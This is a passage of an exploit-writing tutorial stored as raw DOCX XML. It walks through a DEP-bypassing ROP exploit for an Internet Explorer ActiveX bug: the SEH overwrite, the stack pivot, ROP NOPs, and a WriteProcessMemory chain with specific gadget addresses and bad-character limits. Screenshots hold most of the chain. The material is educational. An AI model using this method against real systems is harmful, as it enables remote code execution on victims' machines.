          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>%13%16%47%06</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Open the file in Internet Explorer again (Immunity debugger attached to it), and let the activeX object run.  When the crash occurs, observe the SEH chain and verify that it is overwritten with the correct pointer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Set a breakpoint to 0x06471613. Pass the exception to the application (twice if needed,) until the breakpoint is hit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5353050" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="Image48" descr="">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a:hlinkClick r:id="rId139"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5353050" cy="923925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At this point, ESP points to 01A5E330</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then use F7 to step through the instructions. When the "ADD ESP,46C" instruction is executed, check ESP (and the contents at the top of the stack) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4352925" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49" name="Image49" descr="">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a:hlinkClick r:id="rId141"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4352925" cy="1952625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Awesome, that means that we have been able to pivot the stack and land back in a location where we can initiate the rop chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>From that point forward, this exploit can be built just like any other rop based exploit :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Set your strategy (WriteProcessMemory() in this case, but you can obviously use another technique as well), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Get your rop gadgets (!pvefindaddr rop), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">and build the chain </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>But first of all, you will need to figure out where exactly in the A’s we will land, so we can start the rop chain in the right place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You will notice that, when you try to locate the offset (IE6, IE7), that the offset may change. It may vary somewhere between 72 bytes and 100 bytes (100 bytes max)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That means that we are not 100% sure where we will land in the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>How can we survive that ?  We know the concept of nop’s, to allow trampolines to be a little bit "off" when jumping to shellcode.  But is there such a thing as a rop-compatible nop ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="ropnop"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr/>
        <w:t>ROP NOP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Of course there is. Remember "direct RET sploit version 3" ? We already used a slide to walk to the next address on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to be able to make the exploit generic (without having to create multiple rop chains inside a single exploit), you can simply "spray" some regions of the stack with ROP NOPs, basically represented by pointers to RET. Every time the RET is called, it will slide /jump to the next ret without really doing anything bad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So that’s kinda like a nop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A pointer is made up of 4 bytes, so it will be important to align these pointers, making sure that, when EIP returns to the stack, it would land &amp; execute the instructions at the pointer (and would not land in the middle of a pointer, breaking the chain), or would land directly at the first gadget of your rop chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finding rop nops is not that hard. Any pointer to RET will do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Back to our exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="buildingrop"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr/>
        <w:t>Building the ROP chain – WriteProcessMemory()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Crafting the stack for a given function can be done in many ways. I will simply explain how Lincoln built his rop chain and turned the bug into a working DEP bypassing exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Important note : we have to deal with bad characters : bytes between 80 and 9f must be avoided.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In his exploit, Lincoln decided to use PUSHAD to put the parameters on the stack, in the right place, and then make the call to the function (WriteProcessMemory() in this case).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First of all, to make sure the rop chain gets launched, even if the location where we land after the ADD ESP,46C instruction is different, he used a number of RET pointers (0x06471619) as nop’s :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2724150" cy="1095375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="Image50" descr="">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a:hlinkClick r:id="rId143"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2724150" cy="1095375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then he puts 0x064BC001 into ebp (using a pop ebp + ret gadget at 0x0644B633), and uses a chain of pop instructions (at 0x0647B965) to load 5 "parameters" into registers :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5457825" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="Image51" descr="">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a:hlinkClick r:id="rId145"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5457825" cy="942975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3381375" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52" name="Image52" descr="">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a:hlinkClick r:id="rId147"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3381375" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After these 5 POP’s got executed, the registers look like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3514725" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53" name="Image53" descr="">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a:hlinkClick r:id="rId149"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3514725" cy="1914525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, he will generate the shellcode length. He used 3 ADD EAX,80 instructions and then adds the sub to the current value in EBX :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038725" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="Image54" descr="">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a:hlinkClick r:id="rId151"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5038725" cy="1219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3048000" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="Image55" descr="">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a:hlinkClick r:id="rId153"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="1533525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So the shellcode length is now placed in ebx.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, he will try to put the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The rop gadgets that were used to accomplish this, are POP EAX (take 0xCCD0731F from the stack), and then do SUB EAX,ECX.  Finally, this value is put in EBP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4505325" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="Image56" descr="">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a:hlinkClick r:id="rId155"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId154"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4505325" cy="838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Note : the reason why Lincoln couldn’t just pop 7C9022CF into EBP is because that particular address contains a "bad char" – we cannot use byte 0x80. ECX already contains 50505050, so he used a sub instruction (with a pre-calculated value in eax) to reproduce that pointer. Smart thinking !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3600450" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="Image57" descr="">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a:hlinkClick r:id="rId157"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId156"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3600450" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This rop subchain has put 7C9022CF into EBP. This address will be the target location to write our shellcode to. In essence, we will be patching the WriteProcessMemory() function itself, so this address should sound familiar if you read the section about WriteProcessMemory() carefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The last gadget does not really end with a RET. Instead, it will do a call ESI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Where does ESI come from ?  Remember the 5 POP’s we did earlier? Well, we simply put a value on the stack that got popped into ESI. And that value is a pointer to the following instructions :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4381500" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="Image58" descr="">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descr="">
                      <a:hlinkClick r:id="rId159"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4381500" cy="809625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
